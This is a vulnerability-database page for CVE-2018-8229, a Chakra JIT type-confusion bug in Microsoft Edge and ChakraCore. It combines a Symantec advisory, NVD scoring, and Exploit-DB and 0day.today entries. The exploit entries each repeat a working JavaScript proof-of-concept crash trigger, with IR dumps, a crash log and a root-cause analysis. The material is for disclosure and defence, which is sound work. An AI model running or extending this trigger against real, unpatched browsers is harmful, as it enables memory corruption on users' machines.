Microsoft Chakra Scripting Engine CVE-2018-8229 Remote Memory Corruption Vulnerability
2018-06-12T00:00:00
ID SMNTC-104369 Type symantec Reporter Symantec Security Response Modified 2018-06-12T00:00:00
Description
Description
Microsoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.
Technologies Affected
Microsoft ChakraCore
Microsoft Edge
Recommendations
Run all software as a nonprivileged user with minimal access rights.
To reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.
Deploy network intrusion detection systems to monitor network traffic for malicious activity.
Deploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits
Do not follow links provided by unknown or untrusted sources.
Web users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.
Implement multiple redundant layers of security.
Memory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.
Updates are available. Please see the references or vendor advisory for more information.
{"id": "SMNTC-104369", "type": "symantec", "bulletinFamily": "software", "title": "Microsoft Chakra Scripting Engine CVE-2018-8229 Remote Memory Corruption Vulnerability", "description": "### Description\n\nMicrosoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "published": "2018-06-12T00:00:00", "modified": "2018-06-12T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/104369", "reporter": "Symantec Security Response", "references": [], "cvelist": ["CVE-2018-8229"], "lastseen": "2018-06-13T00:08:36", "viewCount": 4, "enchantments": {"score": {"value": 8.1, "vector": "NONE", "modified": "2018-06-13T00:08:36", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-8229"]}, {"type": "exploitdb", "idList": ["EDB-ID:45013"]}, {"type": "zdt", "idList": ["1337DAY-ID-30708"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148527"]}, {"type": "kaspersky", "idList": ["KLA11264", "KLA11265"]}, {"type": "threatpost", "idList": ["THREATPOST:455B7050303F6EBB708DA86EB2C4872C"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310813530", "OPENVAS:1361412562310813527", "OPENVAS:1361412562310813529", "OPENVAS:1361412562310813526", "OPENVAS:1361412562310813528"]}, {"type": "nessus", "idList": ["SMB_NT_MS18_JUN_4284860.NASL", "SMB_NT_MS18_JUN_4284819.NASL", "SMB_NT_MS18_JUN_4284874.NASL", "SMB_NT_MS18_JUN_4284880.NASL", "SMB_NT_MS18_JUN_4284835.NASL"]}, {"type": "talosblog", "idList": ["TALOSBLOG:30BC73E0EDF7739A87A63A99D8A6E0D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F2BD1E9071121715A43D46B35B2E97A7"]}], "modified": "2018-06-13T00:08:36", "rev": 2}, "vulnersScore": 8.1}, "affectedSoftware": []}
{"cve": [{"lastseen": "2020-12-09T20:25:47", "description": "A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka \"Chakra Scripting Engine Memory Corruption Vulnerability.\" This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-8227.", "edition": 6, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-14T12:29:00", "title": "CVE-2018-8229", "type": "cve", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8229"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/a:microsoft:edge:-", "cpe:/a:microsoft:chakracore:1.8.4"], "id": "CVE-2018-8229", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-8229", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:chakracore:1.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2018-07-12T19:08:34", "description": "Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions. CVE-2018-8229. Dos exploit for Windows platform. Tags: Type Con...", "published": "2018-07-12T00:00:00", "type": "exploitdb", "title": "Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8229"], "modified": "2018-07-12T00:00:00", "id": "EDB-ID:45013", "href": "https://www.exploit-db.com/exploits/45013/", "sourceData": "/*\r\nHere's a PoC:\r\n*/\r\n\r\nfunction opt(str) {\r\n for (let i = 0; i < 200; i++) {\r\n let tmp = str.charCodeAt('AAAAAAAAAA' + str + 'BBBBBBBBBB');\r\n }\r\n}\r\n\r\nopt('x');\r\nopt(0x1234);\r\n\r\n/*\r\nHere's the IR code of the PoC before the global optimization phase:\r\n---------\r\n FunctionEntry #\r\n s18.u64 = ArgIn_A prm1<32>.var #\r\n s9.var = LdSlot s32(s18l[53]).var #\r\n s7.var = LdSlot s20(s18l[51]).var #\r\n s8.var = LdSlot s19(s18l[52]).var #\r\n s1[Object].var = Ld_A 0x7FFFF47A0000 (GlobalObject)[Object].var #\r\n s2.var = LdC_A_I4 0 (0x0).i32 #\r\n s3.var = LdC_A_I4 200 (0xC8).i32 #\r\n s4.var = LdC_A_I4 1 (0x1).i32 #\r\n s5[String].var = LdStr 0x7FFFF47B9080 (\"AAAAAAAAAA\")[String].var #\r\n s6[String].var = LdStr 0x7FFFF47B90A0 (\"BBBBBBBBBB\")[String].var #\r\n s17.var = InitLoopBodyCount #0009 \r\n---------\r\n$L1: >>>>>>>>>>>>> LOOP TOP >>>>>>>>>>>>> Implicit call: no #000b \r\n\r\n\r\n Line 2: i < 200; i++) {\r\n Col 21: ^\r\n StatementBoundary #1 #000b \r\n s17.i32 = IncrLoopBodyCount s17.i32 #000b \r\n BrLt_A $L3, s8.var, s3.var #000b \r\n Br $L2 #0010 \r\n---------\r\n$L3: #0013 \r\n\r\n\r\n Line 3: let tmp = str.charCodeAt('AAAAAAAAAA' + str + 'BBBBBBBBBB');\r\n Col 9: ^\r\n StatementBoundary #2 #0013 \r\n s13.var = Ld_A s7.var #0013 \r\n CheckFixedFld s21(s13->charCodeAt)<0,m~=,+-,s?,s?>.var #0016 Bailout: #0016 (BailOutFailedEquivalentFixedFieldTypeCheck)\r\n s12[ffunc][Object].var = Ld_A 0x7FFFF47972C0 (FunctionObject).var #\r\n s22.var = StartCall 2 (0x2).i32 #001a \r\n s36.var = BytecodeArgOutCapture s13.var #001d \r\n s24[String].var = Conv_PrimStr s5.var #0020 \r\n s25[String].var = Conv_PrimStr s7.var #0020 \r\n s26[String].var = Conv_PrimStr s6.var #0020 \r\n ByteCodeUses s7 #0020 \r\n s27.var = SetConcatStrMultiItemBE s24[String].var #0020 \r\n s28.var = SetConcatStrMultiItemBE s25[String].var, s27.var #0020 \r\n s29.var = SetConcatStrMultiItemBE s26[String].var, s28.var #0020 \r\n s14[String].var = NewConcatStrMultiBE 3 (0x3).u32, s29.var #0020 \r\n s35.var = BytecodeArgOutCapture s14.var #0025 \r\n arg1(s34)<0>.u64 = ArgOut_A_InlineSpecialized 0x7FFFF47972C0 (FunctionObject).var, arg2(s30)<8>.var #0028 \r\n arg1(s23)<0>.var = ArgOut_A s36.var, s22.var #0028 \r\n arg2(s30)<8>.var = ArgOut_A s35.var, arg1(s23)<0>.var #0028 \r\n ByteCodeUses s12 #0028 \r\n s31[CanBeTaggedValue_Int_Number].var = CallDirect String_CharCodeAt.u64, arg1(s34)<0>.u64 #0028 \r\n s9.var = Ld_A s31.var #0032 \r\n\r\n\r\n Line 2: i++) {\r\n Col 30: ^\r\n StatementBoundary #3 #0035 \r\n s8.var = Incr_A s8.var #0035 \r\n Br $L1 #0038 \r\n---------\r\n$L2: #003d \r\n\r\n\r\n Line 5: }\r\n Col 1: ^\r\n StatementBoundary #4 #0038 \r\n s16.i64 = Ld_I4 61 (0x3D).i64 #003d \r\n s19(s18l[52]).var = StSlot s8.var #003e \r\n s32(s18l[53]).var = StSlot s9.var #003e \r\n StLoopBodyCount s17.i32 #003e \r\n Ret s16.i64 #003e \r\n----------------------------------------------------------------------------------------\r\n\r\nAfter the global optimization phase:\r\n---------\r\n FunctionEntry #\r\n s18.u64 = ArgIn_A prm1<32>.var! #\r\n s9[LikelyCanBeTaggedValue_Int].var = LdSlot s32(s18l[53])[LikelyCanBeTaggedValue_Int].var! #\r\n s7<s44>[LikelyCanBeTaggedValue_String].var = LdSlot s20(s18l[51])[LikelyCanBeTaggedValue_String].var! #\r\n s8[LikelyCanBeTaggedValue_Int].var = LdSlot s19(s18l[52])[LikelyCanBeTaggedValue_Int].var! #\r\n s5[String].var = LdStr 0x7FFFF47B9080 (\"AAAAAAAAAA\")[String].var #\r\n s6[String].var = LdStr 0x7FFFF47B90A0 (\"BBBBBBBBBB\")[String].var #\r\n s17.var = InitLoopBodyCount #0009 \r\n s42(s8).i32 = FromVar s8[LikelyCanBeTaggedValue_Int].var # Bailout: #000b (BailOutIntOnly)\r\n s27.var = SetConcatStrMultiItemBE s5[String].var #0020 \r\n s49[String].var = Conv_PrimStr s7<s44>[String].var #\r\n s28.var = SetConcatStrMultiItemBE s49[String].var!, s27.var! #0020 \r\n s29.var = SetConcatStrMultiItemBE s6[String].var, s28.var! #0020 \r\n s14[String].var = NewConcatStrMultiBE 3 (0x3).u32, s29.var! #0020 \r\n BailTarget # Bailout: #000b (BailOutShared)\r\n---------\r\n$L1: >>>>>>>>>>>>> LOOP TOP >>>>>>>>>>>>> Implicit call: no #000b \r\n\r\n\r\n Line 2: i < 200; i++) {\r\n Col 21: ^\r\n StatementBoundary #1 #000b \r\n s17.i32 = IncrLoopBodyCount s17.i32! #000b \r\n BrGe_I4 $L2, s42(s8).i32, 200 (0xC8).i32 #000b \r\n\r\n\r\n Line 3: let tmp = str.charCodeAt('AAAAAAAAAA' + str + 'BBBBBBBBBB');\r\n Col 9: ^\r\n StatementBoundary #2 #0013 \r\n CheckFixedFld s43(s7<s44>[LikelyCanBeTaggedValue_String]->charCodeAt)<0,m~=,++,s44!,s45+,{charCodeAt(0)~=}>.var! #0016 Bailout: #0016 (BailOutFailedEquivalentFixedFieldTypeCheck)\r\n s22.var = StartCall 2 (0x2).i32 #001a \r\n arg1(s34)<0>.u64 = ArgOut_A_InlineSpecialized 0x7FFFF47972C0 (FunctionObject).var, arg2(s30)<8>.var! #0028 \r\n arg1(s23)<0>.var = ArgOut_A s7<s44>[String].var, s22.var! #0028 \r\n arg2(s30)<8>.var = ArgOut_A s14[String].var, arg1(s23)<0>.var! #0028 \r\n s31[CanBeTaggedValue_Int_Number].var = CallDirect String_CharCodeAt.u64, arg1(s34)<0>.u64! #0028 Bailout: #0032 (BailOutOnImplicitCalls)\r\n s9[CanBeTaggedValue_Int_Number].var = Ld_A s31[CanBeTaggedValue_Int_Number].var! #0032 \r\n\r\n\r\n Line 2: i++) {\r\n Col 30: ^\r\n StatementBoundary #3 #0035 \r\n s42(s8).i32 = Add_I4 s42(s8).i32!, 1 (0x1).i32 #0035 \r\n Br $L1 #0038 \r\n---------\r\n$L2: #003d \r\n\r\n\r\n Line 5: }\r\n Col 1: ^\r\n StatementBoundary #4 #003d \r\n s8[CanBeTaggedValue_Int].var = ToVar s42(s8).i32! #003e \r\n s19(s18l[52])[CanBeTaggedValue_Int].var! = StSlot s8[CanBeTaggedValue_Int].var! #003e \r\n s32(s18l[53])[LikelyCanBeTaggedValue_Int_Number].var! = StSlot s9[LikelyCanBeTaggedValue_Int_Number].var! #003e \r\n StLoopBodyCount s17.i32! #003e \r\n Ret 61 (0x3D).i32 #003e \r\n----------------------------------------------------------------------------------------\r\n\r\nCrash log:\r\n[----------------------------------registers-----------------------------------]\r\nRAX: 0x1000000001234 \r\nRBX: 0x7ffff47c5ff4 --> 0x31 ('1')\r\nRCX: 0x7ff7f4600000 --> 0x0 \r\nRDX: 0x0 \r\nRSI: 0x80000001 --> 0x0 \r\nRDI: 0x1000000001234 \r\nRBP: 0x7ffffffef410 --> 0x7ffffffef590 --> 0x7ffffffefb90 --> 0x7ffffffefc90 --> 0x7ffffffefef0 --> 0x7fffffff48b0 (--> ...)\r\nRSP: 0x7ffffffef340 --> 0x7ffffffef3b0 --> 0x1000000001234 \r\nRIP: 0x7ff7f385017a (cmp QWORD PTR [rax],r10)\r\nR8 : 0x55555cfbc870 --> 0x555557fc27e0 (<Js::RecyclableObject::Finalize(bool)>: push rbp)\r\nR9 : 0x7ff7f4600000 --> 0x0 \r\nR10: 0x55555cfbc870 --> 0x555557fc27e0 (<Js::RecyclableObject::Finalize(bool)>: push rbp)\r\nR11: 0x7ffff47b9080 --> 0x55555cfa0f18 --> 0x555557fc27e0 (<Js::RecyclableObject::Finalize(bool)>: push rbp)\r\nR12: 0x0 \r\nR13: 0x7ffff47b36b0 --> 0x55555cfbee70 --> 0x555557fc27e0 (<Js::RecyclableObject::Finalize(bool)>: push rbp)\r\nR14: 0x0 \r\nR15: 0x1000000001234\r\nEFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n 0x7ff7f385016e: mov BYTE PTR [rcx+rax*1],0x1\r\n 0x7ff7f3850172: mov rax,QWORD PTR [rbp-0x10]\r\n 0x7ff7f3850176: mov r10,QWORD PTR [rbp-0x18]\r\n=> 0x7ff7f385017a: cmp QWORD PTR [rax],r10\r\n 0x7ff7f385017d: je 0x7ff7f385037c\r\n 0x7ff7f3850183: mov rcx,rax\r\n 0x7ff7f3850186: mov QWORD PTR [rbp-0x18],rcx\r\n 0x7ff7f385018a: mov eax,DWORD PTR [rcx+0x18]\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0x7ffffffef340 --> 0x7ffffffef3b0 --> 0x1000000001234 \r\n0008| 0x7ffffffef348 --> 0x7ffff471c1e0 --> 0x55555cf48850 --> 0x555556c17100 (<Js::FunctionBody::Finalize(bool)>: push rbp)\r\n0016| 0x7ffffffef350 --> 0x7ffff471c298 --> 0x7ffff4774140 --> 0x10f1215030708 \r\n0024| 0x7ffffffef358 --> 0x7ffff471c298 --> 0x7ffff4774140 --> 0x10f1215030708 \r\n0032| 0x7ffffffef360 --> 0x7ffffffef410 --> 0x7ffffffef590 --> 0x7ffffffefb90 --> 0x7ffffffefc90 --> 0x7ffffffefef0 (--> ...)\r\n0040| 0x7ffffffef368 --> 0x555556c40b8b (<Js::CompactCounters<Js::FunctionBody, Js::FunctionBody::CounterFields>::Get(Js::FunctionBody::CounterFields) const+139>: movzx ecx,BYTE PTR [rbp-0x22])\r\n0048| 0x7ffffffef370 --> 0x7ffff47a4238 --> 0x7ffff47c5fe0 --> 0x7ffff4796a40 --> 0x55555cf4df58 --> 0x555556cb7a20 (<JsUtil::List<Js::LoopEntryPointInfo*, Memory::Recycler, false, Js::CopyRemovePolicy, DefaultComparer>::IsReadOnly() const>: push rbp)\r\n0056| 0x7ffffffef378 --> 0x7ffffffef4a0 --> 0x7ffffffef4c0 --> 0x7ffffffef590 --> 0x7ffffffefb90 --> 0x7ffffffefc90 (--> ...)\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\nStopped reason: SIGSEGV\r\n0x00007ff7f385017a in ?? ()\r\n\r\n\r\nBackground:\r\nInvariant operations like SetConcatStrMultiItemBE in a loop can be hoisted to the landing pad of the loop to avoid performing the same operation multiple times. When Chakra hoists a SetConcatStrMultiItemBE instruction, it creates a new Conv_PrimStr instruction to ensure the type of the Src1 of the SetConcatStrMultiItemBE instruction to be String and inserts it right before the SetConcatStrMultiItemBE instruction.\r\n\r\nWhat happens here is:\r\n1. The CheckFixedFld instruction ensures the type of s7 to be String.\r\n2. Chakra judges that the CheckFixedFld instruction can't be hoisted in the case. It remains in the loop.\r\n3. Chakra judges that the SetConcatStrMultiItemBE instructions can be hoisted. It hoists them along with a newly created Conv_PrimStr instruction, but without invalidating the type of s7 (String).\r\n4. So the \"s49[String].var = Conv_PrimStr s7<s44>[String].var\" instruction is inserted into the landing pad. Since s7 is already assumed to be of String, the instruction will have no effects at all.\r\n5. No type check will be performed. It will result in type confusion.\r\n*/", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45013/"}], "zdt": [{"lastseen": "2018-07-13T02:02:49", "description": "Exploit for windows platform in category dos / poc", "edition": 1, "published": "2018-07-12T00:00:00", "title": "Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8229"], "modified": "2018-07-12T00:00:00", "id": "1337DAY-ID-30708", "href": "https://0day.today/exploit/description/30708", "sourceData": "/*\r\nHere's a PoC:\r\n*/\r\n \r\nfunction opt(str) {\r\n for (let i = 0; i < 200; i++) {\r\n let tmp = str.charCodeAt('AAAAAAAAAA' + str + 'BBBBBBBBBB');\r\n }\r\n}\r\n \r\nopt('x');\r\nopt(0x1234);\r\n \r\n/*\r\nHere's the IR code of the PoC before the global optimization phase:\r\n---------\r\n FunctionEntry #\r\n s18.u64 = ArgIn_A prm1<32>.var #\r\n s9.var = LdSlot s32(s18l[53]).var #\r\n s7.var = LdSlot s20(s18l[51]).var #\r\n s8.var = LdSlot s19(s18l[52]).var #\r\n s1[Object].var = Ld_A 0x7FFFF47A0000 (GlobalObject)[Object].var #\r\n s2.var = LdC_A_I4 0 (0x0).i32 #\r\n s3.var = LdC_A_I4 200 (0xC8).i32 #\r\n s4.var = LdC_A_I4 1 (0x1).i32 #\r\n s5[String].var = LdStr 0x7FFFF47B9080 (\"AAAAAAAAAA\")[String].var #\r\n s6[String].var = LdStr 0x7FFFF47B90A0 (\"BBBBBBBBBB\")[String].var #\r\n s17.var = InitLoopBodyCount #0009 \r\n---------\r\n$L1: >>>>>>>>>>>>> LOOP TOP >>>>>>>>>>>>> Implicit call: no #000b \r\n \r\n \r\n Line 2: i < 200; i++) {\r\n Col 21: ^\r\n StatementBoundary #1 #000b \r\n s17.i32 = IncrLoopBodyCount s17.i32 #000b \r\n BrLt_A $L3, s8.var, s3.var #000b \r\n Br $L2 #0010 \r\n---------\r\n$L3: #0013 \r\n \r\n \r\n Line 3: let tmp = str.charCodeAt('AAAAAAAAAA' + str + 'BBBBBBBBBB');\r\n Col 9: ^\r\n StatementBoundary #2 #0013 \r\n s13.var = Ld_A s7.var #0013 \r\n CheckFixedFld s21(s13->charCodeAt)<0,m~=,+-,s?,s?>.var #0016 Bailout: #0016 (BailOutFailedEquivalentFixedFieldTypeCheck)\r\n s12[ffunc][Object].var = Ld_A 0x7FFFF47972C0 (FunctionObject).var #\r\n s22.var = StartCall 2 (0x2).i32 #001a \r\n s36.var = BytecodeArgOutCapture s13.var #001d \r\n s24[String].var = Conv_PrimStr s5.var #0020 \r\n s25[String].var = Conv_PrimStr s7.var #0020 \r\n s26[String].var = Conv_PrimStr s6.var #0020 \r\n ByteCodeUses s7 #0020 \r\n s27.var = SetConcatStrMultiItemBE s24[String].var #0020 \r\n s28.var = SetConcatStrMultiItemBE s25[String].var, s27.var #0020 \r\n s29.var = SetConcatStrMultiItemBE s26[String].var, s28.var #0020 \r\n s14[String].var = NewConcatStrMultiBE 3 (0x3).u32, s29.var #0020 \r\n s35.var = BytecodeArgOutCapture s14.var #0025 \r\n arg1(s34)<0>.u64 = ArgOut_A_InlineSpecialized 0x7FFFF47972C0 (FunctionObject).var, arg2(s30)<8>.var #0028 \r\n arg1(s23)<0>.var = ArgOut_A s36.var, s22.var #0028 \r\n arg2(s30)<8>.var = ArgOut_A s35.var, arg1(s23)<0>.var #0028 \r\n ByteCodeUses s12 #0028 \r\n s31[CanBeTaggedValue_Int_Number].var = CallDirect String_CharCodeAt.u64, arg1(s34)<0>.u64 #0028 \r\n s9.var = Ld_A s31.var #0032 \r\n \r\n \r\n Line 2: i++) {\r\n Col 30: ^\r\n StatementBoundary #3 #0035 \r\n s8.var = Incr_A s8.var #0035 \r\n Br $L1 #0038 \r\n---------\r\n$L2: #003d \r\n \r\n \r\n Line 5: }\r\n Col 1: ^\r\n StatementBoundary #4 #0038 \r\n s16.i64 = Ld_I4 61 (0x3D).i64 #003d \r\n s19(s18l[52]).var = StSlot s8.var #003e \r\n s32(s18l[53]).var = StSlot s9.var #003e \r\n StLoopBodyCount s17.i32 #003e \r\n Ret s16.i64 #003e \r\n----------------------------------------------------------------------------------------\r\n \r\nAfter the global optimization phase:\r\n---------\r\n FunctionEntry #\r\n s18.u64 = ArgIn_A prm1<32>.var! #\r\n s9[LikelyCanBeTaggedValue_Int].var = LdSlot s32(s18l[53])[LikelyCanBeTaggedValue_Int].var! #\r\n s7<s44>[LikelyCanBeTaggedValue_String].var = LdSlot s20(s18l[51])[LikelyCanBeTaggedValue_String].var! #\r\n s8[LikelyCanBeTaggedValue_Int].var = LdSlot s19(s18l[52])[LikelyCanBeTaggedValue_Int].var! #\r\n s5[String].var = LdStr 0x7FFFF47B9080 (\"AAAAAAAAAA\")[String].var #\r\n s6[String].var = LdStr 0x7FFFF47B90A0 (\"BBBBBBBBBB\")[String].var #\r\n s17.var = InitLoopBodyCount #0009 \r\n s42(s8).i32 = FromVar s8[LikelyCanBeTaggedValue_Int].var # Bailout: #000b (BailOutIntOnly)\r\n s27.var = SetConcatStrMultiItemBE s5[String].var #0020 \r\n s49[String].var = Conv_PrimStr s7<s44>[String].var #\r\n s28.var = SetConcatStrMultiItemBE s49[String].var!, s27.var! #0020 \r\n s29.var = SetConcatStrMultiItemBE s6[String].var, s28.var! #0020 \r\n s14[String].var = NewConcatStrMultiBE 3 (0x3).u32, s29.var! #0020 \r\n BailTarget # Bailout: #000b (BailOutShared)\r\n---------\r\n$L1: >>>>>>>>>>>>> LOOP TOP >>>>>>>>>>>>> Implicit call: no #000b \r\n \r\n \r\n Line 2: i < 200; i++) {\r\n Col 21: ^\r\n StatementBoundary #1 #000b \r\n s17.i32 = IncrLoopBodyCount s17.i32! #000b \r\n BrGe_I4 $L2, s42(s8).i32, 200 (0xC8).i32 #000b \r\n \r\n \r\n Line 3: let tmp = str.charCodeAt('AAAAAAAAAA' + str + 'BBBBBBBBBB');\r\n Col 9: ^\r\n StatementBoundary #2 #0013 \r\n CheckFixedFld s43(s7<s44>[LikelyCanBeTaggedValue_String]->charCodeAt)<0,m~=,++,s44!,s45+,{charCodeAt(0)~=}>.var! #0016 Bailout: #0016 (BailOutFailedEquivalentFixedFieldTypeCheck)\r\n s22.var = StartCall 2 (0x2).i32 #001a \r\n arg1(s34)<0>.u64 = ArgOut_A_InlineSpecialized 0x7FFFF47972C0 (FunctionObject).var, arg2(s30)<8>.var! #0028 \r\n arg1(s23)<0>.var = ArgOut_A s7<s44>[String].var, s22.var! #0028 \r\n arg2(s30)<8>.var = ArgOut_A s14[String].var, arg1(s23)<0>.var! #0028 \r\n s31[CanBeTaggedValue_Int_Number].var = CallDirect String_CharCodeAt.u64, arg1(s34)<0>.u64! #0028 Bailout: #0032 (BailOutOnImplicitCalls)\r\n s9[CanBeTaggedValue_Int_Number].var = Ld_A s31[CanBeTaggedValue_Int_Number].var! #0032 \r\n \r\n \r\n Line 2: i++) {\r\n Col 30: ^\r\n StatementBoundary #3 #0035 \r\n s42(s8).i32 = Add_I4 s42(s8).i32!, 1 (0x1).i32 #0035 \r\n Br $L1 #0038 \r\n---------\r\n$L2: #003d \r\n \r\n \r\n Line 5: }\r\n Col 1: ^\r\n StatementBoundary #4 #003d \r\n s8[CanBeTaggedValue_Int].var = ToVar s42(s8).i32! #003e \r\n s19(s18l[52])[CanBeTaggedValue_Int].var! = StSlot s8[CanBeTaggedValue_Int].var! #003e \r\n s32(s18l[53])[LikelyCanBeTaggedValue_Int_Number].var! = StSlot s9[LikelyCanBeTaggedValue_Int_Number].var! #003e \r\n StLoopBodyCount s17.i32! #003e \r\n Ret 61 (0x3D).i32 #003e \r\n----------------------------------------------------------------------------------------\r\n \r\nCrash log:\r\n[----------------------------------registers-----------------------------------]\r\nRAX: 0x1000000001234 \r\nRBX: 0x7ffff47c5ff4 --> 0x31 ('1')\r\nRCX: 0x7ff7f4600000 --> 0x0 \r\nRDX: 0x0 \r\nRSI: 0x80000001 --> 0x0 \r\nRDI: 0x1000000001234 \r\nRBP: 0x7ffffffef410 --> 0x7ffffffef590 --> 0x7ffffffefb90 --> 0x7ffffffefc90 --> 0x7ffffffefef0 --> 0x7fffffff48b0 (--> ...)\r\nRSP: 0x7ffffffef340 --> 0x7ffffffef3b0 --> 0x1000000001234 \r\nRIP: 0x7ff7f385017a (cmp QWORD PTR [rax],r10)\r\nR8 : 0x55555cfbc870 --> 0x555557fc27e0 (<Js::RecyclableObject::Finalize(bool)>: push rbp)\r\nR9 : 0x7ff7f4600000 --> 0x0 \r\nR10: 0x55555cfbc870 --> 0x555557fc27e0 (<Js::RecyclableObject::Finalize(bool)>: push rbp)\r\nR11: 0x7ffff47b9080 --> 0x55555cfa0f18 --> 0x555557fc27e0 (<Js::RecyclableObject::Finalize(bool)>: push rbp)\r\nR12: 0x0 \r\nR13: 0x7ffff47b36b0 --> 0x55555cfbee70 --> 0x555557fc27e0 (<Js::RecyclableObject::Finalize(bool)>: push rbp)\r\nR14: 0x0 \r\nR15: 0x1000000001234\r\nEFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n 0x7ff7f385016e: mov BYTE PTR [rcx+rax*1],0x1\r\n 0x7ff7f3850172: mov rax,QWORD PTR [rbp-0x10]\r\n 0x7ff7f3850176: mov r10,QWORD PTR [rbp-0x18]\r\n=> 0x7ff7f385017a: cmp QWORD PTR [rax],r10\r\n 0x7ff7f385017d: je 0x7ff7f385037c\r\n 0x7ff7f3850183: mov rcx,rax\r\n 0x7ff7f3850186: mov QWORD PTR [rbp-0x18],rcx\r\n 0x7ff7f385018a: mov eax,DWORD PTR [rcx+0x18]\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0x7ffffffef340 --> 0x7ffffffef3b0 --> 0x1000000001234 \r\n0008| 0x7ffffffef348 --> 0x7ffff471c1e0 --> 0x55555cf48850 --> 0x555556c17100 (<Js::FunctionBody::Finalize(bool)>: push rbp)\r\n0016| 0x7ffffffef350 --> 0x7ffff471c298 --> 0x7ffff4774140 --> 0x10f1215030708 \r\n0024| 0x7ffffffef358 --> 0x7ffff471c298 --> 0x7ffff4774140 --> 0x10f1215030708 \r\n0032| 0x7ffffffef360 --> 0x7ffffffef410 --> 0x7ffffffef590 --> 0x7ffffffefb90 --> 0x7ffffffefc90 --> 0x7ffffffefef0 (--> ...)\r\n0040| 0x7ffffffef368 --> 0x555556c40b8b (<Js::CompactCounters<Js::FunctionBody, Js::FunctionBody::CounterFields>::Get(Js::FunctionBody::CounterFields) const+139>: movzx ecx,BYTE PTR [rbp-0x22])\r\n0048| 0x7ffffffef370 --> 0x7ffff47a4238 --> 0x7ffff47c5fe0 --> 0x7ffff4796a40 --> 0x55555cf4df58 --> 0x555556cb7a20 (<JsUtil::List<Js::LoopEntryPointInfo*, Memory::Recycler, false, Js::CopyRemovePolicy, DefaultComparer>::IsReadOnly() const>: push rbp)\r\n0056| 0x7ffffffef378 --> 0x7ffffffef4a0 --> 0x7ffffffef4c0 --> 0x7ffffffef590 --> 0x7ffffffefb90 --> 0x7ffffffefc90 (--> ...)\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\nStopped reason: SIGSEGV\r\n0x00007ff7f385017a in ?? ()\r\n \r\n 